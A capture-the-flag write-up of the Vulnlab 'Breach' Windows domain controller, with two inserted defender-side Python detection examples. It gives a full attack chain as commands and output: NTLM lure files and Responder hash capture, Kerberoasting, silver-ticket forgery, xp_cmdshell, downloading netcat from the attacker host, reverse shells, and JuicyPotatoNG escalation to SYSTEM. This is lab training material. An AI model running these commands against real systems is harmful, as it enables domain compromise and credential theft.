vulnlab breach

A Medium Windows machine.

Tools used: ntlm_theft.py, impacket-getPac, impacket-GetUserSPNs, ldapdomaindump, impacket-mssqlclient, JuicyPotatoNG.exe

We generate a set of files that, when opened, trigger an outbound NTLM authentication whose NTLMv2 hash can be captured, using this tool: https://github.com/Greenwolf/ntlm_theft

python ntlm_theft.py -g all -s 10.10.97.69 -f puckie

┌──(puck㉿kali)-[~/vulnlab/breach]
sudo responder -I tun0

                                         __
  .----.-----.-----.-----.-----.-----.--|  |.-----.----.
  |   _|  -__|__ --|  _  |  _  |     |  _  ||  -__|   _|
  |__| |_____|_____|   __|_____|__|__|_____||_____|__|
                   |__|

           NBT-NS, LLMNR & MDNS Responder 3.1.4.0

  To support this project:
  Github -> https://github.com/sponsors/lgandx


[+] Generic Options:
    Responder NIC              [tun0]
    Responder IP               [10.8.2.138]
    Responder IPv6             [fe80::e718:d192:5032:1452]
    Challenge set              [random]
    Don't Respond To Names     ['ISATAP', 'ISATAP.LOCAL']

[+] Current Session Variables:
    Responder Machine Name     [WIN-88BT76XF41N]
    Responder Domain Name      [FBHG.LOCAL]
    Responder DCE-RPC Port     [49865]

[+] Listening for events...

[SMB] NTLMv2-SSP Client   : 10.10.97.69
[SMB] NTLMv2-SSP Username : BREACH\Julia.Wong
[SMB] NTLMv2-SSP Hash     : Julia.Wong::BREACH:1fa52157fd1fca3b:2A0E8B36B448C002767DE27807FE3F48:0101000000000000005034B29DB8DA01623247E1694337960000000002000800460042004800470001001E00570049004E002D0038003800420054003700360058004600340031004E0004003400570049004E002D0038003800420054003700360058004600340031004E002E0046004200480047002E004C004F00430041004C000300140046004200480047002E004C004F00430041004C000500140046004200480047002E004C004F00430041004C0007000800005034B29DB8DA010600040002000000080030003000000000000000010000000020000007196E9E493DFA17295C160C4781E2F23F634A0B97A48BF7DEF201FA24F1CE0E0A0010000000000000000000000000000000000009001E0063006900660073002F00310030002E0038002E0032002E003100330038000000000000000000
[*] Skipping previously captured hash for BREACH\Julia.Wong
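As an added, defender-side example (not from the original write-up), the following parses the NetNTLMv2 line Responder printed above and decodes the AV_PAIR target info the client signed. The machine name, domain and SPN inside it are the values Responder advertised (WIN-88BT76XF41N, FBHG.LOCAL, cifs/10.8.2.138) rather than anything in the BREACH domain, which is what makes such a capture stand out when the same fields are inspected in network telemetry; the known-domain list is an assumption for this box.

```python
import re
import struct
from datetime import datetime, timedelta, timezone

# The NetNTLMv2 line Responder printed above, copied from the page and used here as test input.
CAPTURED_LINE = "Julia.Wong::BREACH:1fa52157fd1fca3b:2A0E8B36B448C002767DE27807FE3F48:0101000000000000005034B29DB8DA01623247E1694337960000000002000800460042004800470001001E00570049004E002D0038003800420054003700360058004600340031004E0004003400570049004E002D0038003800420054003700360058004600340031004E002E0046004200480047002E004C004F00430041004C000300140046004200480047002E004C004F00430041004C000500140046004200480047002E004C004F00430041004C0007000800005034B29DB8DA010600040002000000080030003000000000000000010000000020000007196E9E493DFA17295C160C4781E2F23F634A0B97A48BF7DEF201FA24F1CE0E0A0010000000000000000000000000000000000009001E0063006900660073002F00310030002E0038002E0032002E003100330038000000000000000000"

AV_NAMES = {1: "NbComputerName", 2: "NbDomainName", 3: "DnsComputerName", 4: "DnsDomainName",
            5: "DnsTreeName", 6: "Flags", 7: "Timestamp", 8: "SingleHost", 9: "TargetName",
            10: "ChannelBindings"}


def parse_netntlmv2(line):
    """Split user::domain:ServerChallenge:NTProofStr:blob and decode the blob's AV_PAIR list."""
    user, _, domain, server_challenge, nt_proof, blob_hex = line.strip().split(":")
    blob = bytes.fromhex(blob_hex)
    # Blob layout (MS-NLMP NTLMv2_CLIENT_CHALLENGE): RespType(1) HiRespType(1) Reserved(6)
    # TimeStamp(8) ClientChallenge(8) Reserved(4) AvPairs(...)
    filetime = struct.unpack("<Q", blob[8:16])[0]          # 100 ns ticks since 1601-01-01 UTC
    signed_at = datetime(1601, 1, 1, tzinfo=timezone.utc) + timedelta(microseconds=filetime // 10)
    av, pos = {}, 28
    while True:
        av_id, av_len = struct.unpack("<HH", blob[pos:pos + 4])
        pos += 4
        if av_id == 0:                                      # MsvAvEOL ends the list
            break
        value = blob[pos:pos + av_len]
        pos += av_len
        if av_id in (1, 2, 3, 4, 5, 9):                     # string-valued pairs are UTF-16LE
            value = value.decode("utf-16-le")
        av[AV_NAMES.get(av_id, f"Av{av_id}")] = value
    return {"user": user, "domain": domain, "server_challenge": server_challenge,
            "nt_proof": nt_proof, "signed_at": signed_at, "av": av}


def responder_indicators(parsed, known_domains):
    """Flag target-info values that do not belong to the real environment. A poisoned
    LLMNR/NBT-NS answer makes the client sign whatever name the rogue server advertised."""
    av, findings = parsed["av"], []
    for key in ("NbDomainName", "DnsDomainName", "DnsTreeName"):
        value = av.get(key, "")
        if value and value.lower() not in known_domains:
            findings.append(f"{key}={value!r} is not a known domain")
    target = av.get("TargetName", "")
    if re.fullmatch(r"[A-Za-z]+/\d{1,3}(?:\.\d{1,3}){3}", target):
        findings.append(f"TargetName={target!r} is an SPN for a bare IP address")
    return findings
```

The decoded timestamp (2024-06-07 UTC) also lines up with the LastLogon values seen later in the LDAP dump.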

NetNTLMv2 hashes are hashcat mode 5600; the mode number is listed on the hashcat example-hashes page.

hashcat -a 0 -m 5600 julia_wong.txt /usr/share/wordlists/rockyou.txt

As Julia.Wong:

┌──(puck㉿kali)-[~/vulnlab/breach]
impacket-getPac -targetUser administrator breach.vl/julia.wong:Computer1       
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

KERB_VALIDATION_INFO 
LogonTime:                      
    dwLowDateTime:                   2560514102 
    dwHighDateTime:                  30942228 
LogoffTime:                     
--snip--

Domain SID: S-1-5-21-2330692793-3312915120-706255856

 0000   10 00 00 00 F5 18 12 7A  3C 36 13 6A 18 C4 BD 3F   .......z<6.j...?

┌──(puck㉿kali)-[~/vulnlab/breach]
impacket-GetUserSPNs breach.vl/julia.wong:Computer1 -dc-ip 10.10.97.69 -request 
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

ServicePrincipalName              Name       MemberOf  PasswordLastSet             LastLogon                   Delegation 
--------------------------------  ---------  --------  --------------------------  --------------------------  ----------
MSSQLSvc/breachdc.breach.vl:1433  svc_mssql            2022-02-17 05:43:08.106169  2024-06-07 05:23:44.260778             



$krb5tgs$23$*svc_mssql$BREACH.VL$breach.vl/svc_mssql*$a497b878287c08cf634ef3530131743b$[remainder of hash truncated]

Getting more users:

┌──(puck㉿kali)-[~/vulnlab/breach]
ldapdomaindump breach.vl -u 'breach\Julia.Wong' -p 'Computer1'
[*] Connecting to host...
[*] Binding to host
[+] Bind OK
[*] Starting domain dump
[+] Domain dump finished
cat domain_users.grep | grep svc 
svc_mssql svc_mssql svc_mssql Domain Users 02/17/22 10:43:07 06/07/24 13:34:45 06/07/24 13:34:45 NORMAL_ACCOUNT, DONT_EXPIRE_PASSWD 02/17/22 10:43:08 S-1-5-21-2330692793-3312915120-706255856-1115

bloodhound-python -d breach.vl -u 'Julia.Wong' -p 'Computer1' -c all -ns 10.10.97.69 

Silver ticket created with the NTLM hash of the svc_mssql user:

To forge a silver ticket we need the domain SID, the service account's NTLM hash and the service's SPN.

┌──(puck㉿kali)-[~/vulnlab/breach]
iconv -f ASCII -t UTF-16LE <(printf "Trustno1") | openssl dgst -md4 
MD4(stdin)= 69596c7aa1e8daee17f8e78870e25a5c


impacket-ticketer -nthash 69596c7aa1e8daee17f8e78870e25a5c -domain-sid S-1-5-21-2330692793-3312915120-706255856 -domain breach.vl -dc-ip breachdc -spn MSSQLSvc/breachdc.breach.vl:1433 administrator
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Creating basic skeleton ticket and PAC Infos
[*] Customizing ticket for breach.vl/administrator
[*] 	PAC_LOGON_INFO
[*] 	PAC_CLIENT_INFO_TYPE
[*] 	EncTicketPart
[*] 	EncTGSRepPart
[*] Signing/Encrypting final ticket
[*] 	PAC_SERVER_CHECKSUM
[*] 	PAC_PRIVSVR_CHECKSUM
[*] 	EncTicketPart
[*] 	EncTGSRepPart
[*] Saving ticket in administrator.ccache
export KRB5CCNAME=administrator.ccache

┌──(puck㉿kali)-[~/vulnlab/breach]
impacket-mssqlclient -k breachdc.breach.vl
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(BREACHDC\SQLEXPRESS): Line 1: Changed database context to 'master'.
[*] INFO(BREACHDC\SQLEXPRESS): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (150 7208) 
[!] Press help for extra shell commands
SQL (BREACH\Administrator  dbo@master)> 
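Two detection checks for the Kerberos steps in this write-up, added here as an example and not part of the original post: the Kerberoast request (a 4769 for svc_mssql's SPN with RC4, etype 0x17, which is what the $krb5tgs$23$ prefix records) and the use of the forged ticket above (a Kerberos network logon as Administrator that the DC never issued a service ticket for). The event records are constructed samples with Windows Security log field names; correlating 4624 with 4769 by account and source IP assumes both the DC's and the service host's logs are collected in the same window (on this box they are the same machine).

```python
# Constructed sample events modelled on Windows Security log fields (not real logs from the box).
EVENTS = [
    # Julia.Wong's TGS request for the MSSQLSvc SPN: RC4 (0x17), as the $krb5tgs$23$ prefix shows
    {"EventID": 4769, "TargetUserName": "julia.wong@BREACH.VL", "ServiceName": "svc_mssql",
     "TicketEncryptionType": "0x17", "IpAddress": "10.8.2.138"},
    # an ordinary AES ticket for the DC's own account; must not be flagged
    {"EventID": 4769, "TargetUserName": "julia.wong@BREACH.VL", "ServiceName": "BREACHDC$",
     "TicketEncryptionType": "0x12", "IpAddress": "10.8.2.138"},
    # the forged ticket being presented: a Kerberos network logon as Administrator on the SQL host
    {"EventID": 4624, "TargetUserName": "Administrator", "LogonType": "3",
     "AuthenticationPackageName": "Kerberos", "IpAddress": "10.8.2.138"},
]


def kerberoast_requests(events):
    """4769 with RC4 for a non-computer, non-krbtgt service account: the Kerberoast request pattern."""
    return [e for e in events
            if e["EventID"] == 4769 and e["TicketEncryptionType"] == "0x17"
            and not e["ServiceName"].endswith("$") and e["ServiceName"].lower() != "krbtgt"]


def unissued_kerberos_logons(events):
    """Kerberos network logons with no 4769 from the DC for that account and source address.
    A silver ticket never touches the KDC, so the service sees a logon the DC did not issue."""
    issued = {(e["TargetUserName"].split("@")[0].lower(), e["IpAddress"])
              for e in events if e["EventID"] == 4769}
    return [e for e in events
            if e["EventID"] == 4624 and e["LogonType"] == "3"
            and e["AuthenticationPackageName"] == "Kerberos"
            and (e["TargetUserName"].lower(), e["IpAddress"]) not in issued]


if __name__ == "__main__":
    for e in kerberoast_requests(EVENTS):
        print("RC4 service ticket requested:", e["ServiceName"], "by", e["TargetUserName"])
    for e in unissued_kerberos_logons(EVENTS):
        print("Kerberos logon without a DC-issued ticket:", e["TargetUserName"], "from", e["IpAddress"])
```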

SQL: enabling xp_cmdshell for command execution

SQL (BREACH\Administrator  dbo@master)> sp_configure 'show advanced options', '1'
[*] INFO(BREACHDC\SQLEXPRESS): Line 185: Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.
SQL (BREACH\Administrator  dbo@master)> RECONFIGURE
SQL (BREACH\Administrator  dbo@master)> sp_configure 'xp_cmdshell', '1'
[*] INFO(BREACHDC\SQLEXPRESS): Line 185: Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
SQL (BREACH\Administrator  dbo@master)> RECONFIGURE
SQL (BREACH\Administrator  dbo@master)> xp_cmdshell dir "C:\"
output
----------------------------------------------------------
 Volume in drive C has no label.
 Volume Serial Number is B465-02B6
NULL
 Directory of C:\
NULL
08/19/2021  06:24 AM    <DIR>          EFI
02/17/2022  09:55 AM    <DIR>          inetpub
05/08/2021  08:20 AM    <DIR>          PerfLogs
02/17/2022  10:28 AM    <DIR>          Program Files
02/17/2022  10:27 AM    <DIR>          Program Files (x86)
02/17/2022  02:11 PM    <DIR>          share
02/17/2022  01:12 PM    <DIR>          Users
02/17/2022  03:35 PM    <DIR>          Windows
               0 File(s)              0 bytes
               8 Dir(s)  11,722,678,272 bytes free
NULL

SQL (BREACH\Administrator  dbo@master)> xp_cmdshell powershell -c "wget -usebasicparsing http://10.8.2.138:8000/nc64.exe -o C:\Temp\nc64.exe"
output   
------   
NULL     

SQL (BREACH\Administrator  dbo@master)> xp_cmdshell dir "C:\Temp"
output
--------------------------------------------------
 Volume in drive C has no label.
 Volume Serial Number is B465-02B6
NULL
 Directory of C:\Temp
NULL
06/07/2024  10:34 AM    <DIR>          .
06/07/2024  10:34 AM            45,272 nc64.exe
               1 File(s)         45,272 bytes
               1 Dir(s)  11,754,811,392 bytes free
NULL

SQL (BREACH\Administrator  dbo@master)> xp_cmdshell powershell -c "C:\Temp\nc64.exe -e cmd 10.8.2.138 4444"

Privesc with JuicyPotatoNG

┌──(puck㉿kali)-[~/vulnlab/breach]
└─$ nc -nlvp 4444 
listening on [any] 4444 ...
connect to [10.8.2.138] from (UNKNOWN) [10.10.97.69] 59869
Microsoft Windows [Version 10.0.20348.558]
(c) Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
whoami
breach\svc_mssql

C:\Windows\system32>whoami /all
whoami /all

USER INFORMATION
----------------

User Name        SID                                          
================ =============================================
breach\svc_mssql S-1-5-21-2330692793-3312915120-706255856-1115


GROUP INFORMATION
-----------------

Group Name                                 Type             SID                                                             Attributes                                        
========================================== ================ =============================================================== ==================================================
Everyone                                   Well-known group S-1-1-0                                                         Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                              Alias            S-1-5-32-545                                                    Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias            S-1-5-32-554                                                    Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\SERVICE                       Well-known group S-1-5-6                                                         Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON                              Well-known group S-1-2-1                                                         Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users           Well-known group S-1-5-11                                                        Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization             Well-known group S-1-5-15                                                        Mandatory group, Enabled by default, Enabled group
NT SERVICE\MSSQL$SQLEXPRESS                Well-known group S-1-5-80-3880006512-4290199581-1648723128-3569869737-3631323133 Enabled by default, Enabled group, Group owner    
LOCAL                                      Well-known group S-1-2-0                                                         Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication           Well-known group S-1-5-64-10                                                     Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level       Label            S-1-16-12288                                                                                                      


PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State   
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeMachineAccountPrivilege     Add workstations to domain                Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled 
SeManageVolumePrivilege       Perform volume maintenance tasks          Enabled 
SeImpersonatePrivilege        Impersonate a client after authentication Enabled 
SeCreateGlobalPrivilege       Create global objects                     Enabled 
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled


USER CLAIMS INFORMATION
-----------------------

User claims unknown.

Kerberos support for Dynamic Access Control on this device has been disabled.

C:\Windows\system32>cd c:\temp
cd c:\temp

c:\Temp>powershell
powershell
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

Install the latest PowerShell for new features and improvements! https://aka.ms/PSWindows

PS C:\Temp> wget -usebasicparsing http://10.8.2.138:8000/JuicyPotatoNG.exe -o JuicyPotatoNG.exe
wget -usebasicparsing http://10.8.2.138:8000/JuicyPotatoNG.exe -o JuicyPotatoNG.exe
PS C:\Temp> dir
dir

    Directory: C:\Temp

Mode                 LastWriteTime         Length Name                                                                 
----                 -------------         ------ ----                                                                 
-a----          6/7/2024  11:08 AM         153600 JuicyPotatoNG.exe                                                    
-a----          6/7/2024  10:34 AM          45272 nc64.exe                                                             


PS C:\Temp> .\JuicyPotatoNG.exe -t * -p .\nc64.exe -l 443 -a "-e cmd 10.8.2.138 445"
.\JuicyPotatoNG.exe -t * -p .\nc64.exe -l 443 -a "-e cmd 10.8.2.138 445"
PS C:\Temp>

┌──(puck㉿kali)-[~/vulnlab/breach]
rlwrap nc -nlvp 445
listening on [any] 445 ...
connect to [10.8.2.138] from (UNKNOWN) [10.10.97.69] 64454
Microsoft Windows [Version 10.0.20348.558]
(c) Microsoft Corporation. All rights reserved.

C:\>whoami
whoami
nt authority\system

c:\Users\Administrator\Desktop>hostname
hostname
BREACHDC
